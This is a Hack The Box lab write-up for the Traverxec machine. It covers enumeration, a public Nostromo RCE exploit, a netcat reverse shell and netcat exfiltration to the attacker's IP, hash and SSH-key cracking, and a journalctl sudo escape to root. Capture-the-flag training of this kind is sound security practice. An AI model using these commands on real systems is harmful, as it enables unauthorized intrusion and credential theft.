Hack The Box — Traverxec — without Metasploit (TJNull’s list for OSCP)
This is my 19th write-up for Traverxec, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.
nmap -p- 10.129.179.144 --max-retries=2
So, we have only 2 services running. HTTP and SSH. Let’s run a targeted scan on these ports.
nmap -sC -sV -A -T4 -p22,80 10.129.179.144
Here we can see that we have nostromo server running on port 80 with version 1.9.6. Let’s visit the web server and see what we have there.
We don’t seem to have anything useful here. Let’s run a gobuster.
gobuster dir -u http://10.129.179.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,cgi,sh,db,jsp,html,log,txt -t 200 -k --no-error(However, Spoiler alert: You will not find anything useful on gobuster either.)
Initial Foothold
Let’s search for an exploit of Nostromo 1.9.6. I just Googled and found out this.
https://github.com/theRealFr13nd/CVE-2019-16278-Nostromo_1.9.6-RCE
Let’s try this out.
And it does work. Let’s a get a reverse shell quickly. First let’s check if the target has netcat installed, simply by running ‘which nc’.
And it does! Let’s start a listener and get a netcat reverse shell.
python2 CVE-2019-16278.py -t 10.129.179.144 -p 80 -c "nc 10.10.16.32 4242 -e /bin/bash"
Ok, so we have an initial shell as www-data user. Let’s upgrade the shell using python pty.
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Let’s see what users we have on the target system, other than root.
cat /etc/passwd
We have a user david on the target. Let’s see what we have in his home directory.
We can’t seem to list the content… But we can get into this directory.
Let’s check the permissions for this directory.
We can’t read the contents because we don’t have the read permissions, but we can get into this directory because the execute permission is enabled. So, we are out of options for the home directory here.
Let’s check what we have in the Nostromo config files. First we have to check where is nostromo’s directory.
find / -name nostromo -type d 2>/dev/null
Nostromo directory is in /var. Let’s see what we have in there.
Let’s get into the conf directory.
Here we have .htpasswd and nhttpd.conf files. Let’s read them both and see what do we have in them, since we have the read permissions.
.htpasswd gives us a passwod hash for user david. We can try cracking it using hashcat. Let’s save it for now.
nhttpd.conf gives us home directories. First, just put the hascat on our attacking machine on the job to crack that hash, and then let’s search for these directories while hashcat is running in the background.
hashcat -m 500 -a 0 david.hash /usr/share/wordlists/rockyou.txt -O
(Note: remove the string ‘david’ from the start of the hash before you put that into a file [david.hash in my case])
Let’s search for the home directory public_www that we got from the nhttpd.conf file.
find / -name public_www -type d 2>/dev/null
I tried running the command twice but it didn’t give me any result. There are two options now; either the directory doesn’t exist on the system (which is highly unlikely to happen) or it is present inside a directory that we can not read. (/home/david/ comes to my mind first.)
Let’s see if we have public_www inside /home/david.
cd /home/david/public_www
And yes! It’s here. It also contains a directory named protected-file-area. Let’s see what we have in there.
So, we have a compressed package backup-ssh-identity-files.tgz . This could be an interesting package judging by the name. Let’s transfer it to our attacking machine using netcat. First start a listener and redirect all the output in a tgz file.
Now send the file from the target.
cat backup-ssh-identity-files.tgz | nc 10.10.16.32 4243
After a few minutes, close the connection from the attacking machine, using CTRL+C.
We have the file on our attacking machine. Let’s extract it.
gunzip ssh_id.tgz
tar -xvf ssh_id.tar
Let’s read the contents of /home/david/.ssh/id_rsa
We have an encrypted ssh private key. We need to decrypt it first in order to use it to connect through ssh.
Let’s check hashcat, if the password hash has cracked yet.
And we have the password here. Let’s try simply doing su david on our target machine since we have the password.
The password appears to be wrong. Let’s see if we can use this password as ssh key passphrase to use it.
Doesn’t work here either. Let’s try cracking the rsa key using john. For that, first we have to convert it into john format.
ssh2john home/david/.ssh/id_rsa >david_john_rsa
Now let’s crack it using john.
john david_john_rsa -w /usr/share/wordlists/rockyou.txt --format=SSH
hunter is the passphrase. Let’s ssh into the target with user david.
And we are in! Let’s see what commands can we run as sudo .
We only have passphrase for the SSH private key, we still don’t have password for user david. Let’s see what we have in it’s home directory.
We have the user.txt flag here and also a directory named bin. Let’s check it.
We have a bash script server-stats.sh and a header file server-stats.head . Let’s read the script first.
First it prints out the header from server-stats.head file and in the end it’s running a command as sudo. Let’s run the script and see what happens.
If we look back at the script we can notice something.
The sudo command runs after printing a string Last 5 journal log lines:
And if we see the output again.
We have this output after the statement Last 5 journal log lines:
One more thing to notice in the script is that journal -n5 -unostromo.service command is running and then it’s being piped into /usr/bin/cat . By default this command outputs in linux tool less instead of cat .
According to GTFO bins we can use this technique, when journalctl invokes less. Let’s try this. We will copy paste the command but neglect /usr/bin/cat part.
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/bash
And we are root! ;)
